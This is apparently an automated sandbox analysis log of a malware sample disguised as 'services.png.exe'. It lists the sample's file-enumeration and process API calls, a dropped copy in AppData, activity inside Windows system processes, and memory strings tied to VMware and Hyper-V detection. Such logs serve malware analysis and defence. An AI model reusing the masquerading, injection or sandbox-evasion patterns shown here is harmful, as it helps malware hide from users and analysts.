Source: C:\Windows\System32\ctfmon.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\ApplicationFrameHost.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00414ADD FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,	0_2_00414ADD
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_004394BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	0_2_004394BB
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00439576 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00439576
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02849576 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_02849576
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02824ADD FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,	0_2_02824ADD
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_028494BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	0_2_028494BB
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00414ADD WaitForSingleObject,FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,	1_2_00414ADD
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00414A30 FindFirstFileW,	1_2_00414A30
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_004394BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	1_2_004394BB
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00439576 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	1_2_00439576
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438BDCE0 FindFirstFileExW,	2_2_000001CD438BDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A656DCE0 FindFirstFileExW,	3_2_00000151A656DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29CFDCE0 FindFirstFileExW,	4_2_0000019E29CFDCE0
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4EDCE0 FindFirstFileExW,	5_2_000001F28B4EDCE0
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B54DCE0 FindFirstFileExW,	5_2_000001F28B54DCE0
Source: C:\Windows\explorer.exe	Code function: 6_2_0907DCE0 FindFirstFileExW,	6_2_0907DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D596DCE0 FindFirstFileExW,	7_2_00000221D596DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 9_2_000001ECFC69DCE0 FindFirstFileExW,	9_2_000001ECFC69DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D17874DCE0 FindFirstFileExW,	14_2_000001D17874DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787ADCE0 FindFirstFileExW,	14_2_000001D1787ADCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6120DCE0 FindFirstFileExW,	17_2_0000023B6120DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6126DCE0 FindFirstFileExW,	17_2_0000023B6126DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7EDCE0 FindFirstFileExW,	18_2_000002135E7EDCE0
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E818DCE0 FindFirstFileExW,	19_2_000001F6E818DCE0

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_00433EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,

0_2_00433EDE

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\

Source: svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
Source: SearchApp.exe, 0000000A.00000003.1887968363.0000024B5A30C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe
Source: nyheukpo.exe, 00000001.00000002.2935128249.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.000000000065E000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578341398.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2219902983.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626813607.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2205551996.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2508191877.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2184984523.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2997437165.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734659917.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1750623185.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.1751487185.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000000.1755557906.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ddddddddccccccccccbbbbbbbbbbbbbbbaaaaaaaaaaaaa``````@
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 8E}\Longman\L\|vmware horizon client\|vm ware8394
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: A-C0F2E0B9FA8\|vmware workstation 12 player\|vmpl5459
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7\|wacom preferences\|bamboo3652E}\TP-LINK\USB\|visual studio code\|visual code6793er.exe1\|watchtower research\|wtr14332E0B9FA8E}\Leic\|watchtower translation system\|wts244r.exe\|vmware horizon client\|view5503eMatchingPuz\|wave viewpoint\|vertical2985g.winrt12388
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|mstsc1643m M\|vegas pro 13.0 (64-bit)\|sony vegas4226AF0-\|total video converter\|tvc2449roStation CON\|track-it! technician client\|trackit2470386\|vmware vsphere client\|vspe63888E}\DGIT\Dan\|vmware vsphere client\|vcenter5038{6D809377\|vmware workstation 15 player\|vmplayer6438\|voice recorder*\|voice recording80347
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: r.exe\|vmware horizon client\|view5503
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware horizon client\|vm ware8394
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: E}\Att\Att.ex\|vmware horizon client\|vmare7220
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A4\|visual studio code\|visuak9719AP\Qsync\Qsyn\|visual studio code\|visula8564A-C0F2E0B9FA8\|vmware workstation 12 player\|vmpl545987
Source: explorer.exe, 00000006.00000000.1751487185.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000006.00000000.1750623185.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: SearchApp.exe, 0000000A.00000000.1934841532.0000024B59D5E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: explorer.exe, 00000006.00000002.3047788765.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware workstation 12 player\|vmpl5459
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|\|vmware6886
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|hyper-v manager\|vm4595
Source: SearchApp.exe, 0000000A.00000003.1826598931.0000024B5CB02000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|*\|qemu10642
Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware horizon clientsidersrecord voice:wux:record voicevmware vsphere client
Source: explorer.exe, 00000006.00000002.3089421963.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware horizon client\|vmare7220
Source: RuntimeBroker.exe, 00000009.00000000.1786938102.000001ECFA2A4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: F-A0\|hyper-v manager\|virtual5441
Source: explorer.exe, 00000006.00000002.3098429643.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware horizon client
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware workstation 15 player\|vmplayer6438
Source: explorer.exe, 00000006.00000002.2933946089.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000002.3133456773.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}onnnnnnnnnnnnnnnmmmmmmmmmmmmmmllllllllllllllllllkkkk@
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|\|qemu10642
Source: nyheukpo.exe, 00000001.00000002.2935128249.000000000065E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6.2; ARM; Trident/8.0; Touch; rv:11.0; WPDesktop) like Gecko
Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware workstation 12 player
Source: svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware workstation 15 playerwaK
Source: explorer.exe, 00000006.00000000.1755557906.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}onnnnnnnnnnnnnnnmmmmmmmmmmmmmmllllllllllllllllllkkkk@
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|hyper-v manager\|hyperv4178
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|hyper-v manager\|virtual5441
Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware workstation 15 player
Source: SearchApp.exe, 0000000A.00000003.1887968363.0000024B5A30C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exeex
Source: services.png.exe, 00000000.00000002.2168632443.000000000049E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Ko\|internet download manager\|idman7834Center_\|internet download manager\|idmm8541team://r\|ibm integration toolkit 10.0.0.7\|iib403A-C\|i.r.i.s. ocr registration\|iris1117Applicat\|ibm integration toolkit 10.0.0.12\|iib1F-A0\|hyper-v manager\|virtual5441ArcaEvolution\A\|ibm integration toolkit 10.0.0.15\|iib1F2E0\|idle (python gui)\|python idle5336nt\Commun\|ibm integration toolkit 10.0.0.11\|iib144B-\|image composite editor\|ice852rocare.exe12\|integrated architecture builder\|iab1Langri\|integrated dealer systems - g2\|ids1249-A0F\|idle (python 3.7 32-bit)\|idel6028ABX\v5.15\|income tax planner workstation\|bna1
Source: SearchApp.exe, 0000000A.00000003.1891881714.0000024340D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App
Source: SearchApp.exe, 0000000A.00000003.1899723944.0000024340D8D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exe
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: E0B9FA8E}\A\|vmware horizon client\|vdi3894
Source: explorer.exe, 00000006.00000000.1750623185.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000006.00000000.1747285438.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: SearchApp.exe, 0000000A.00000003.1891881714.0000024340D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Zultys\MXIE\Bin\mxie.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\SAP\NWBC60\NWBC.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ExitLag\ExitLag.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\BYOND\bin\byond.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\S.I.Ap\AFIP\siap.exeAirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App93int
Source: explorer.exe, 00000006.00000002.3098429643.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {6D809377\|vmware workstation 15 player\|vmplayer6438
Source: explorer.exe, 00000006.00000000.1755557906.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}KJKLKLLLLKLLKKJJJKLLJKKKKLKIIJKKJJJJJJJJIIIJHHIIIIHH@z
Source: explorer.exe, 00000006.00000002.3133456773.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ddddddddccccccccccbbbbbbbbbbbbbbbaaaaaaaaaaaaa``````@
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware vsphere client\|vspe6388
Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware vsphere client
Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware workstation 12 playeramp64ver644
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {6D8\|hpe unified functional testing\|uft1\CTI De\|huawei operation & maintenance system\|lmt1\|hyper-v manager\|hyper v4919\KKT\bin\fptr10\|idle (python 3.7 64-bit)\|idel59960F2E0B9FA\|ibm notes (basic)\|lotus3079er.exe12577
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware horizon client\|vdi3894
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|hyper-v manager\|hyper v4919
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {\|visual studio 2019\|devenv6360E}\Att\Att.ex\|vmware horizon client\|vmare7220E0B9FA8E}\A\|vmware horizon client\|vdi3894ys.exe12389
Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|visual studio 2015\|visula72818E}\Longman\L\|vmware horizon client\|vm ware8394BFC-874A-\|vpn access manager\|shrew3128kerStrategy.co\|visual studio code\|vscode4061EF-A0FB-4BFC-\|visual studio 2015\|vius7396tion\3D Vision\\|visual studio code\|visy9233-4BFC-874A-C0F2\|voice recorder\|recording5394s\x86\windbg.e\|voyager workstation administration\|vwa1xnw\|wacom tablet properties\|intuos65524A-C0F2E\|watchtower media suite\|wms1ofessional\cute\|visual studio 2015\|visy7256E5D-B744-2EB1AE\|visual studio code\|vius9283ngodb.compass1\|visual studio 2017\|devenv57290B9FA8E}\SPSS\|visual studio code\|vs code67864
Source: SearchApp.exe, 0000000A.00000003.1899723944.0000024340D8D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Sparx Systems\EA\EA.exe{6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exe32988BernardoZamora.SolitaireHD_1fgex2kbsn6g8!App{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PSPad editor\PSPad.exe{6D809377-6AF0-444B-8957-A3773F02200E}\KMSpico\scripts\Log.cmd{6D809377-6AF0-444B-8957-A3773F02200E}\PureRef\PureRef.exe{6D809377-6AF0-444B-8957-A3773F02200E}\Mailbird\Mailbird.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AirPort\APUtil.exe10803{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\TeraPad\TeraPad.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MusicBee\MusicBee.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\uTorrent\uTorrent.exe
Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware horizon client\|view5503
Source: svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
